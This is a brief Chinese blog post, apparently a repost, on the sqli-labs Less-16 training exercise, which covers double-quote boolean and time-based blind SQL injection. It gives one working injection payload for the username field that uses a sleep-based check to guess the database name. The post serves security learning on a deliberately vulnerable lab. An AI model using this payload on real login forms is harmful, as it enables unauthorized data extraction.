sqli-labs:Less-16

Less-16实验主要是:双引号boolen/时间盲注

这个实验过程和Less-15基本是一样的,只是用的是双引号。这里就不过多介绍了,利用代码为在username输入:
admin") and If(ascii(substr(database(),1,1))=115,1,sleep(5))#
密码随便输入。

猜你喜欢

转载自www.cnblogs.com/tangjf10/p/12659693.html